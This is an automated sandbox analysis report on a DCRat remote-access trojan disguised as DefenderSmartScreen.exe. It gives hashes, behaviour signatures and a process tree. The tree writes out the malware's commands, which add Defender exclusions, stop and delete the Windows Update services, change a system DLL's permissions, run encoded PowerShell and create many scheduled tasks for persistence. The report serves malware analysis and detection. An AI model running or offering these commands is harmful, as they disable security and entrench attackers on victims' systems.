Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
30-08-2022 02:15
General
-
Target
DefenderSmartScreen.exe
-
Size
1.4MB
-
MD5
5d66bae46d9759662f2309dc9bb8d2cc
-
SHA1
bd553872c196f31bc879555ae9f68dca5a337ba7
-
SHA256
47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe
-
SHA512
18f49104b2de5cae32e90d43eab28ed37a5dcb5a661ce3fa57b52555009f3fd88683d711c631420acd01d1a24dafee94539c6143e185f7ecbb6d7646fbd5e3c1
-
SSDEEP
24576:9PV32MblP1ol19heoF6heWOeWlERO6XmN/DipYrkJDF:/324okobWyl3N/Di4k
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies security service 2 TTPs 5 IoCs
-
Process spawned unexpected child process 57 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass 3 TTPs 6 IoCs
-
DCRat payload 3 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 5 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Drops file in Program Files directory 18 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 59 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\DefenderSmartScreen.exe"C:\Users\Admin\AppData\Local\Temp\DefenderSmartScreen.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\dllhost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\Network Sharing\RuntimeBroker.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\StartMenuExperienceHost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Start Menu\csrss.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office16\upfc.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DefenderSmartScreen.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\sihost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\fontdrvhost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\dwm.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Tasks\dllhost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\SearchApp.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sppsvc.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\wininit.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre1.8.0_66\bin\wininit.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\My Videos\SppExtComObj.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\dwm.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\backgroundTaskHost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\backgroundTaskHost.exe'2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\upfc.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Tasks\dllhost.exe"C:\Windows\Tasks\dllhost.exe"2⤵
- UAC bypass
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\381a8b94-7a40-4dbc-8f4c-a019438f4876.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c6268287-8663-4d4a-aed0-2058a63a41f2.vbs"3⤵
-
C:\Users\Admin\AppData\Local\Temp\new1.exe"C:\Users\Admin\AppData\Local\Temp\new1.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C4Updater.exe"C:\Users\Admin\AppData\Local\Temp\C4Updater.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\C4Updater.exe"4⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAYQB2AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHIAcABwACMAPgAgAEAAKAAgADwAIwB2AGkAdgBnACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBxAHcAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAawBmACMAPgA="5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAaQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABTAG0AYQByAHQAUwBjAHIAZQBlAG4AUQBDAFwARABlAGYAZQBuAGQAZQByAFwARABlAGYAZQBuAGQAZQByAFAAcgBvAHQAZQBjAHQAaQBvAG4ALgBlAHgAZQAiACcAKQAgADwAIwBlAGQAYgB4ACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAbgB5AGwAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB5AGkAeQBnACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBTAG0AYQByAHQAUwBjAHIAZQBlAG4ARABlAGYAZQBuAGQAZQByAFEAQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGEAdQAjAD4AOwA="5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\odt\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\Network Sharing\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\Network Sharing\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Start Menu\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\Start Menu\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Start Menu\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office16\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office16\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office\Office16\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Users\Default\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Default\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\odt\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\odt\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Windows\Tasks\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Tasks\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Tasks\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\Windows Security\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Portable Devices\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Java\jre1.8.0_66\bin\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
